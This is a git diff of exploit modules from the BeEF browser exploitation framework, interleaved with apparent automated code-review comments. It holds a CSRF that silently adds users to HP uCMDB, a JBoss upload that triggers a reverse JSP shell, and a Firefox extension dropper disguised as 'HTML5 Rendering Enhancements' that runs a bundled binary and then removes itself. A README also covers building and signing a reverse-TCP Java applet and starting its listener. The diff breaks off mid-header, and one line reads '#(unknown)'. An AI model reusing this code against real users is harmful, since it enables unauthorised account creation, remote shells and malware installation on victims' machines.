+beef.execute(function() {
+var protocol = '<%= @protocol %>';
+var host = '<%= @host %>';
+var port = '<%= @port %>';
+var usertype = '<%= @usertype %>';
+var customerid = '<%= @customerid %>';
+var username = '<%= @username %>';
+var password = '<%= @password %>';
+
+var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
+url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
+
+if (usertype == 'createIntegrationUser'){
+ url += '&arg3=';
+}
+
+var ucmdb_iframe = beef.dom.createInvisibleIframe();
+ucmdb_iframe.setAttribute('src', url);
+
+cleanup = function() {
+ document.body.removeChild(ucmdb_iframe);
+}
+setTimeout("cleanup()", 15000);
+
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
+});
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
new file mode 100644
index 000000000..dee13334a
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ hp_ucmdb_add_user_csrf:
+ enable: true
+ category: "Exploits"
+ name: "HP uCMDB 9.0x add user CSRF"
+ description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).
For more information please refer to http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html"
+ authors: ["Bart Leppens"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
new file mode 100644
index 000000000..26c7bfe4b
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
@@ -0,0 +1,31 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
+ 'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
+ 'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
+ },
+ {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+ {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
+ { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
+ 'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
+ 'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
+ },
+ {'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
+ {'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/jboss_jmx_upload_exploit/command.js b/modules/exploits/jboss_jmx_upload_exploit/command.js
index 1d64217ff..3ac086fad 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/command.js
+++ b/modules/exploits/jboss_jmx_upload_exploit/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
 * Jboss 6.0.0M1 JMX Upload Exploit
 * Ported from l33tb0y Ruby code in Javascript by antisnatchor.
@@ -43,11 +34,11 @@ beef.execute(function() {
 uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
 /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
- beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
- if(response.status_code == "success"){
+ beef.net.forge_request("http", "HEAD", rhost, rport, uri, null, null, null, 10, 'script', true, null,function(response){
+ if(response.status_code == 200){
 function triggerReverseConn(){
- beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
- if(response.status_code == "success"){
+ beef.net.forge_request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, null, 10, 'script', true, null,function(response){
+ if(response.status_code == 200){
 if(payloadType == "reverse"){
 beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
 }else{
@@ -64,4 +55,4 @@ beef.execute(function() {
 beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
 }
 });
-});
\ No newline at end of file
+});
diff --git a/modules/exploits/jboss_jmx_upload_exploit/config.yaml b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
index 880a582a3..144002fbd 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/config.yaml
+++ b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
@@ -23,3 +13,4 @@ beef:
 authors: ["antisnatchor", "l33tb0y"]
 target:
 working: ["ALL"]
+ not_working: "O"
diff --git a/modules/exploits/jboss_jmx_upload_exploit/module.rb b/modules/exploits/jboss_jmx_upload_exploit/module.rb
index a5345cdb6..17a537ac0 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/module.rb
+++ b/modules/exploits/jboss_jmx_upload_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Jboss_jmx_upload_exploit < BeEF::Core::Command
diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
index c6eeac3d6..838cddb0d 100755
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
diff --git a/modules/exploits/local_host/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml
index 0a4d45a45..d2caf410e 100755
--- a/modules/exploits/local_host/activex_command_execution/config.yaml
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/local_host/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb index c8dd70d8c..26f93d7c0 100755 --- a/modules/exploits/local_host/activex_command_execution/module.rb +++ b/modules/exploits/local_host/activex_command_execution/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Activex_command_execution < BeEF::Core::Command 
diff --git a/modules/exploits/local_host/firefox_extension_dropper/command.js b/modules/exploits/local_host/firefox_extension_dropper/command.js new file mode 100644 index 000000000..4dae24103 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_dropper/command.js 
@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var xpi_name = '<%= @xpi_name %>';
+ var domain = '<%= @domain %>';
+ var ff_extension = '/' + xpi_name + '.xpi';
+
+ if(beef.browser.isFF()){
+ var id = beef.dom.generateID();
+ var pid = beef.dom.generateID();
+ var zztop = beef.dom.getHighestZindex()+1;
+ var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+ var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+ var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+ $j('body').append(el);
+ var hid = '#'+id;
+ var hpid = '#'+pid;
+ $j(hid).append(elp);
+ $j(hpid).html("<%= @notification_text %> ");
+ $j(hid).append(elr);
+ $j(hid).click(function() {
+ $j(this).slideUp(300,function() {
+ $j(this).remove();
+ });
+ //window.location.href = ff_extension;
+ window.open(ff_extension);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+ });
+ $j(hid).css('cursor','pointer');
+ $j(hid).slideDown(300,function() {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+ });
+ }
+});
diff --git a/modules/exploits/local_host/firefox_extension_dropper/config.yaml b/modules/exploits/local_host/firefox_extension_dropper/config.yaml
new file mode 100644
index 000000000..ea46d4cf2
--- /dev/null
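Review bot: `var domain = '<%= @domain %>';` is assigned but never read — `ff_extension` is built from `xpi_name` alone as a root-relative path, so the 'Serving Domain' option this module exposes has no effect in this script; either drop the variable or state the intent with a comment such as `// extension is always fetched from the hooked page's own origin; @domain is unused`. `$j(hpid).html("<%= @notification_text %> ")` reads an instance variable that does not appear among the module's declared options, so the banner text will presumably render empty unless it is set elsewhere — worth confirming. The `elr` declaration is missing its terminating semicolon, and the commented-out `//window.location.href = ff_extension;` line should be deleted rather than kept as dead code.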
+++ b/modules/exploits/local_host/firefox_extension_dropper/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + firefox_extension_dropper: + enable: true + category: ["Exploits", "Local Host"] + name: "Firefox Extension Dropper" + description: "Create on the fly a malicious Firefox extension that embeds a dropper you can specify (add it to the 'dropper' directory).

The extension is based on the original work from Michael Schierl and his Metasploit module." + authors: ["antisnatchor"] + target: + user_notify: ["FF"] + not_working: ["All"] \ No newline at end of file diff --git a/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt b/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt new file mode 100644 index 000000000..89e9322f9 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_dropper/dropper/readme.txt @@ -0,0 +1,2 @@ +Place in this directory the binary you want to drop and execute through the Firefox extension. +Make sure to have just ONE file in this directory (other than this readme.txt). \ No newline at end of file diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js b/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js new file mode 100644 index 000000000..dcaf24fa6 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_dropper/extension/bootstrap.js 
@@ -0,0 +1,30 @@
+
+function startup(data, reason) {
+ var file = Components.classes["@mozilla.org/file/directory_service;1"].
+ getService(Components.interfaces.nsIProperties).
+ get("ProfD", Components.interfaces.nsIFile);
+ file.append("extensions");
+ xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";payload_name="__payload_placeholder__";
+ file.append(xpi_guid);
+ file.append(payload_name);
+ var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+ getService(Components.interfaces.nsIProperties).
+ get("TmpD", Components.interfaces.nsIFile);
+ tmp.append(payload_name);
+ tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+ file.copyTo(tmp.parent, tmp.leafName);
+
+ var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+ process.init(tmp);
+ process.run(false,[],0);
+
+ try { // Fx < 4.0
+ Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+ } catch (e) {}
+ try { // Fx 4.0 and later
+ Components.utils.import("resource://gre/modules/AddonManager.jsm");
+ AddonManager.getAddonByID(xpi_guid, function(addon) {
+ addon.uninstall();
+ });
+ } catch (e) {}
+ }
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt b/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt
new file mode 100644
index 000000000..9aa47d25d
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/build/readme.txt
@@ -0,0 +1 @@
+This is a temp directory where the Firefox extension will be built.
\ No newline at end of file
diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest b/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest
new file mode 100644
index 000000000..2864216f5
--- /dev/null
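Review bot: `xpi_guid` and `payload_name` are assigned without `var` on the seventh line of `startup`, so they become implicit globals of the bootstrap scope; declare them locally, e.g. `var xpi_guid = "{861fb387-92ce-bb0a-cb48-4b923dbc292b}"; var payload_name = "__payload_placeholder__";`. Both `catch (e) {}` blocks discard the error entirely, so a failed uninstall on either Firefox branch is invisible; at minimum log `e` in each. The `0666` argument to `createUnique` is a legacy octal literal, which is worth a comment since it is easy to misread. Unlike the other new files in this module, this file carries no header comment stating what `startup` does or why both uninstall paths are attempted.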
+++ b/modules/exploits/local_host/firefox_extension_dropper/extension/chrome.manifest @@ -0,0 +1,2 @@ +content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./ +overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf b/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf new file mode 100644 index 000000000..0813095d0 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_dropper/extension/install.rdf @@ -0,0 +1,24 @@ + + + + {861fb387-92ce-bb0a-cb48-4b923dbc292b} + __extension_name_placeholder__ + 1.0 + true + true + + + toolkit@mozilla.org + 1.0 + * + + + + + {ec8030f7-c20a-464f-9b0e-13a3a9e97384} + 1.0 + * + + + + \ No newline at end of file diff --git a/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul b/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul new file mode 100644 index 000000000..91ca363e4 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_dropper/extension/overlay.xul @@ -0,0 +1,5 @@ + + + + \ No newline at end of file diff --git a/modules/exploits/local_host/firefox_extension_dropper/module.rb b/modules/exploits/local_host/firefox_extension_dropper/module.rb new file mode 100644 index 000000000..83a92af27 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_dropper/module.rb 
@@ -0,0 +1,96 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Firefox_extension_dropper < BeEF::Core::Command
+
+ class Bind_extension < BeEF::Core::Router::Router
+ before do
+ headers 'Content-Type' => 'application/x-xpinstall',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ get '/' do
+ response['Content-Type'] = "application/x-xpinstall"
+ extension_path = settings.extension_path
+ print_info "Serving malicious Firefox Extension Dropper: #{extension_path}"
+ send_file "#{extension_path}",
+ :type => 'application/x-xpinstall',
+ :disposition => 'inline'
+ end
+ end
+
+ def pre_send
+
+ # gets the value configured in the module configuration by the user
+ @datastore.each do |input|
+ if input['name'] == "extension_name"
+ @extension_name = input['value']
+ end
+ if input['name'] == "xpi_name"
+ @xpi_name = input['value']
+ end
+ end
+
+ mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper"
+ extension_path = mod_path + "/extension"
+
+ # clean the build directory
+ FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
+
+ # retrieve the name of the dropper binary
+ Dir.foreach("#{mod_path}/dropper") do |item|
+ if item != "readme.txt" && item != "." && item != ".."
+ @dropper = item
+ print_info "Using dropper: '#{mod_path}/dropper/#{@dropper}'"
+ end
+ end
+ if @dropper.nil?
+ print_error "No dropper found in '#{mod_path}/dropper'"
+ return
+ end
+
+ # copy in the build directory necessary file, substituting placeholders
+ File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
+ File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__payload_placeholder__", @dropper)}
+ File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
+ File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
+ FileUtils.cp "#{mod_path}/dropper/#{@dropper}", "#{extension_path}/build/#{@dropper}"
+
+ extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest", @dropper]
+
+ # create the XPI extension container
+ xpi = "#{extension_path}/#{@xpi_name}.xpi"
+ if File.exist?(xpi)
+ File.delete(xpi)
+ end
+ Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
+ extension_content.each do |filename|
+ xpi.add(filename, "#{extension_path}/build/#(unknown)")
+ end
+ end
+
+ # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
+ bind_extension = Firefox_extension_dropper::Bind_extension
+ bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_dropper/extension/#{@xpi_name}.xpi"
+ BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
+ BeEF::Core::Server.instance.remap
+ end
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ return [
+ {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
+ {'name' => 'xpi_name', 'ui_label' => 
'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
+ {'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beefdomain'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+end
diff --git a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar
deleted file mode 100644
index 8959c4ed9..000000000
Binary files a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar and /dev/null differ
diff --git a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
deleted file mode 100644
index 2c38c932d..000000000
Binary files a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar and /dev/null differ
diff --git a/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar b/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar
new file mode 100644
index 000000000..30e058e87
Binary files /dev/null and b/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar differ
diff --git a/modules/exploits/local_host/java_payload/README.txt b/modules/exploits/local_host/java_payload/README.txt
new file mode 100644
index 000000000..df644a52d
--- /dev/null
+++ b/modules/exploits/local_host/java_payload/README.txt
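Review bot: `String#gsub!` returns `nil` when the placeholder is not present, so the two `File.open ... gsub!` lines in `pre_send` would silently write an empty `install.rdf` or `bootstrap.js` instead of failing; use the non-bang `gsub` (or check the result) on both lines. `@xpi_name` and `@extension_name` are taken straight from the module datastore and interpolated into filesystem paths, the `Zip::File` target and the mount path with no validation, so a value containing `/` or `..` would leave the extension directory — restrict them to a safe character set such as `/\A[\w\-]+\z/` before use. The second argument to `xpi.add` reads `#(unknown)` on this page, which looks garbled; it presumably should interpolate `filename`. The `Dir.foreach` loop accepts any entry, including subdirectories and dotfiles such as `.DS_Store` (which this same commit adds to `.gitignore`), and a later entry silently overwrites an earlier one, so check `File.file?` and bail out when more than one candidate is found. `beef_host` in `self.options` is computed but never used.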
@@ -0,0 +1,50 @@
+--- How to use this module ---
+The following is how you compile the JavaPayload handlers :
+
+$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
+$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
+$cd .. && ant compile && ant jar
+$cd build/bin
+$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
+
+At this point you have the applet ready to go, with a reverseTCP handler:
+Applet_ReverseTCP.jar
+Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
+with Java 6 to run it on those versions too - SUGGESTED :-).
+
+At this stage you need to sign the applet.
+The following is to create a self-signed certificate and then sign it.
+Obviously if you have a valid code signing certificate, even better ;)
+
+keytool -keystore tmp -genkey
+jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
+
+Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
+
+You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
+java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+
+Now launch the BeEF module.
+If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
+antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+! help
+help: show information about commands.
+ Usage: help [command]
+
+Supported commands:
+ help - show this help
+ info - list system properties
+ pwd - show current directory
+ cd - change directory
+ ls - list directory
+ exec - execute native command
+ cat - show text file
+ wget - download file
+ telnet - create TCP connection
+ paste - create text file
+ jobs - list or continue jobs
+ exit - Exit JSh
+
+When inside an interactive command, enter ~. on a new
+line to exit from that command. Enter ~& to background the command.
+Enter ~~ to start a line with a ~ character
\ No newline at end of file
diff --git a/modules/exploits/local_host/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
index 8ebcfcc28..fc2665027 100755
--- a/modules/exploits/local_host/java_payload/command.js
+++ b/modules/exploits/local_host/java_payload/command.js
@@ -1,24 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var conn = '<%= @conn %>'; var cbHost = '<%= @cbHost %>'; var cbPort = '<%= @cbPort %>'; - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar'; + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar'; var applet_id = '<%= @applet_id %>'; var applet_name = '<%= @applet_name %>'; diff --git a/modules/exploits/local_host/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml index 651dedb7b..5aaa61d93 100755 --- a/modules/exploits/local_host/java_payload/config.yaml +++ b/modules/exploits/local_host/java_payload/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -22,5 +12,4 @@ beef: description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.

Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh

Windows Vista is not supported." authors: ["antisnatchor"] target: - not_working: ["FF"] user_notify: ["All"] diff --git a/modules/exploits/local_host/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb index 2f3380bc7..97caa35d4 100755 --- a/modules/exploits/local_host/java_payload/module.rb +++ b/modules/exploits/local_host/java_payload/module.rb @@ -1,22 +1,12 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Java_payload < BeEF::Core::Command def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar') end def self.options diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js index 758a5dea5..65d91fd55 100644 --- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js +++ 